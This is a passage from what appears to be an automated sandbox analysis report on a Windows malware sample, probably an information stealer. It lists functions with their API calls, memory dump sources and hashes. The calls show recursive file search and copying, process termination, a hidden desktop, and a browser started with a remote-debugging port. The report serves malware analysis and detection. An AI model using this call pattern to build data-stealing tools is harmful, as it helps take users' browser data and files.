                                  • StrCmpCA.SHLWAPI(?,011CD550), ref: 002C16B3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C16F4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C171D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1745
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C17BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002C181C
                                  • FindClose.KERNEL32(00000000), ref: 002C182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: d02627e0ef265e74ee8f3c2ed997d04033b629c09d991abb561a0717b7bd3490
                                  • Instruction ID: 3576fd4f0b4216c32c9b0f0dba3c1503c2ca5cad9f662c7266ed0a9a563893b9
                                  • Opcode Fuzzy Hash: d02627e0ef265e74ee8f3c2ed997d04033b629c09d991abb561a0717b7bd3490
                                  • Instruction Fuzzy Hash: C91274709207479BDB24EF74D88AEAE77B8AF45340F54462CF84AD7252DB34DC258B90
                                  Function 002CCBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 002CCBFC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002CCC13
                                  • lstrcat.KERNEL32(?,?), ref: 002CCC5F
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002CCC71
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002CCC8B
                                  • wsprintfA.USER32 ref: 002CCCB0
                                  • PathMatchSpecA.SHLWAPI(?,011C9118), ref: 002CCCE2
                                  • CoInitialize.OLE32(00000000), ref: 002CCCEE
                                    • Part of subcall function 002CCAE0: CoCreateInstance.COMBASE(002DB110,00000000,00000001,002DB100,?), ref: 002CCB06
                                    • Part of subcall function 002CCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 002CCB46
                                    • Part of subcall function 002CCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 002CCBC9
                                  • CoUninitialize.COMBASE ref: 002CCD09
                                  • lstrcat.KERNEL32(?,?), ref: 002CCD2E
                                  • lstrlen.KERNEL32(?), ref: 002CCD3B
                                  • StrCmpCA.SHLWAPI(?,002DCFEC), ref: 002CCD55
                                  • wsprintfA.USER32 ref: 002CCD7D
                                  • wsprintfA.USER32 ref: 002CCD9C
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 002CCDB0
                                  • wsprintfA.USER32 ref: 002CCDD8
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 002CCDF1
                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 002CCE10
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 002CCE28
                                  • CloseHandle.KERNEL32(00000000), ref: 002CCE33
                                  • CloseHandle.KERNEL32(00000000), ref: 002CCE3F
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002CCE54
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CCE94
                                  • FindNextFileA.KERNEL32(?,?), ref: 002CCF8D
                                  • FindClose.KERNEL32(?), ref: 002CCF9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                  • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 3860919712-2388001722
                                  • Opcode ID: e18aa7784ab1c6b675d9cec5eb2929abab1e9053404870597d176a77ca784344
                                  • Instruction ID: 4b5362cf2867e493e4750e7b2e4803844110e9be28d59c7f21eb50f3dd227089
                                  • Opcode Fuzzy Hash: e18aa7784ab1c6b675d9cec5eb2929abab1e9053404870597d176a77ca784344
                                  • Instruction Fuzzy Hash: 62C160719202599BDF60EF64DC85FEE7779AF48300F1445ADF50AA7281DA30AE94CFA0
                                  Function 002C1269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C12BF
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002C12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C12E7
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002C12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C133A
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002C135C
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002C1376
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C13E2
                                  • lstrlen.KERNEL32(002E1794), ref: 002C13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C140A
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1416
                                  • lstrlen.KERNEL32(?), ref: 002C1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C1451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C147A
                                  • StrCmpCA.SHLWAPI(?,011CD670), ref: 002C14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1535
                                  • StrCmpCA.SHLWAPI(?,011CD9B0), ref: 002C1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C15E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C17BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002C181C
                                  • FindClose.KERNEL32(00000000), ref: 002C182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: d2b7c4f5cca6a9a2d5f7ff896326482d94a428dcb9b4cdd0aee4a7cd4113cb30
                                  • Instruction ID: b320cf730fd7f28993e5de33e37bcb6585d9870e649d728b862113a074a1c457
                                  • Opcode Fuzzy Hash: d2b7c4f5cca6a9a2d5f7ff896326482d94a428dcb9b4cdd0aee4a7cd4113cb30
                                  • Instruction Fuzzy Hash: FBC181719207479BDB21EF74DC8ABEE77B8AF45340F544228F84AA7252DB30DC258B90
                                  Function 002B9770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 002B9790
                                  • lstrcat.KERNEL32(?,?), ref: 002B97A0
                                  • lstrcat.KERNEL32(?,?), ref: 002B97B1
                                  • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 002B97C3
                                  • memset.MSVCRT ref: 002B97D7
                                    • Part of subcall function 002D3E70: lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D3EA5
                                    • Part of subcall function 002D3E70: lstrcpy.KERNEL32(00000000,011CA4A0), ref: 002D3ECF
                                    • Part of subcall function 002D3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,002B134E,?,0000001A), ref: 002D3ED9
                                  • wsprintfA.USER32 ref: 002B9806
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 002B9827
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 002B9844
                                    • Part of subcall function 002D46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002D46B9
                                    • Part of subcall function 002D46A0: Process32First.KERNEL32(00000000,00000128), ref: 002D46C9
                                    • Part of subcall function 002D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 002D46DB
                                    • Part of subcall function 002D46A0: StrCmpCA.SHLWAPI(?,?), ref: 002D46ED
                                    • Part of subcall function 002D46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 002D4702
                                    • Part of subcall function 002D46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 002D4711
                                    • Part of subcall function 002D46A0: CloseHandle.KERNEL32(00000000), ref: 002D4718
                                    • Part of subcall function 002D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 002D4726
                                    • Part of subcall function 002D46A0: CloseHandle.KERNEL32(00000000), ref: 002D4731
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B9878
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B9889
                                  • lstrcat.KERNEL32(00000000,002E4B60), ref: 002B989B
                                  • memset.MSVCRT ref: 002B98AF
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002B98D4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B9903
                                  • StrStrA.SHLWAPI(00000000,011CE040), ref: 002B9919
                                  • lstrcpyn.KERNEL32(004E93D0,00000000,00000000), ref: 002B9938
                                  • lstrlen.KERNEL32(?), ref: 002B994B
                                  • wsprintfA.USER32 ref: 002B995B
                                  • lstrcpy.KERNEL32(?,00000000), ref: 002B9971
                                  • Sleep.KERNEL32(00001388), ref: 002B99E7
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                    • Part of subcall function 002B92B0: strlen.MSVCRT ref: 002B92E1
                                    • Part of subcall function 002B92B0: strlen.MSVCRT ref: 002B92FA
                                    • Part of subcall function 002B92B0: strlen.MSVCRT ref: 002B9399
                                    • Part of subcall function 002B92B0: strlen.MSVCRT ref: 002B93E6
                                    • Part of subcall function 002D4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 002D4759
                                    • Part of subcall function 002D4740: Process32First.KERNEL32(00000000,00000128), ref: 002D4769
                                    • Part of subcall function 002D4740: Process32Next.KERNEL32(00000000,00000128), ref: 002D477B
                                    • Part of subcall function 002D4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 002D479C
                                    • Part of subcall function 002D4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 002D47AB
                                    • Part of subcall function 002D4740: CloseHandle.KERNEL32(00000000), ref: 002D47B2
                                    • Part of subcall function 002D4740: Process32Next.KERNEL32(00000000,00000128), ref: 002D47C0
                                    • Part of subcall function 002D4740: CloseHandle.KERNEL32(00000000), ref: 002D47CB
                                  • CloseDesktop.USER32(?), ref: 002B9A1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 958055206-1862457068
                                  • Opcode ID: 8b369fe54155103fc083798262da38a5a563343f18a17670144b7c98cbadc2cf
                                  • Instruction ID: 5a34300790aa4bb27d6bf00e5eb0a1a58c4c5209198ad802cc1c4985fb545f49
                                  • Opcode Fuzzy Hash: 8b369fe54155103fc083798262da38a5a563343f18a17670144b7c98cbadc2cf
                                  • Instruction Fuzzy Hash: 01918471A50208ABDB50DF74DC89FDE77B8AF48700F5041A9F609AB281DB70AE548FA4
                                  Function 002CE210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 002CE22C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002CE243
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002CE263
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002CE27D
                                  • wsprintfA.USER32 ref: 002CE2A2
                                  • StrCmpCA.SHLWAPI(?,002DCFEC), ref: 002CE2B4
                                  • wsprintfA.USER32 ref: 002CE2D1
                                    • Part of subcall function 002CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 002CEE12
                                  • wsprintfA.USER32 ref: 002CE2F0
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 002CE304
                                  • lstrcat.KERNEL32(?,011CEA38), ref: 002CE335
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002CE347
                                  • lstrcat.KERNEL32(?,?), ref: 002CE358
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002CE36A
                                  • lstrcat.KERNEL32(?,?), ref: 002CE37E
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 002CE394
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE3D2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE422
                                  • DeleteFileA.KERNEL32(?), ref: 002CE45C
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002CE49B
                                  • FindClose.KERNEL32(00000000), ref: 002CE4AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 1375681507-2848263008
                                  • Opcode ID: 1a0f5c5912654ad68ab360e5e1b29e6ebbda38087fb59e7f23f0687c8b2abec9
                                  • Instruction ID: 64f8085f733c92dc85e29a6b7eebcc04dd089705c277a96389da322f21cce39b
                                  • Opcode Fuzzy Hash: 1a0f5c5912654ad68ab360e5e1b29e6ebbda38087fb59e7f23f0687c8b2abec9
                                  • Instruction Fuzzy Hash: 818183719202599BCF20EF64DC89EEE7779BF44300F4446A8B54A97181DB34AE68CFA4
                                  Function 002B16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B16E2
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B176C
                                  • lstrcat.KERNEL32(00000000), ref: 002B1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B17A2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B18FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat
                                  • String ID: \*.*
                                  • API String ID: 2276651480-1173974218
                                  • Opcode ID: 926498b29487d0a6bbb920a1a65fb0044c6636fee2374b4a22e8ffd9b6ee446d
                                  • Instruction ID: 0d36bff3be5d49721137b0e97ca08cb77c32a0f514544df388ac4eb2aaa23878
                                  • Opcode Fuzzy Hash: 926498b29487d0a6bbb920a1a65fb0044c6636fee2374b4a22e8ffd9b6ee446d
                                  • Instruction Fuzzy Hash: D781913193064BDBDB21EF64D999AEEB7B9AF04380F644124F845AB252CB309C35CF91
                                  Function 002CDD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 002CDD45
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002CDD4C
                                  • wsprintfA.USER32 ref: 002CDD62
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002CDD79
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002CDD9C
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002CDDB6
                                  • wsprintfA.USER32 ref: 002CDDD4
                                  • DeleteFileA.KERNEL32(?), ref: 002CDE20
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 002CDDED
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                    • Part of subcall function 002CD980: memset.MSVCRT ref: 002CD9A1
                                    • Part of subcall function 002CD980: memset.MSVCRT ref: 002CD9B3
                                    • Part of subcall function 002CD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CD9DB
                                    • Part of subcall function 002CD980: lstrcpy.KERNEL32(00000000,?), ref: 002CDA0E
                                    • Part of subcall function 002CD980: lstrcat.KERNEL32(?,00000000), ref: 002CDA1C
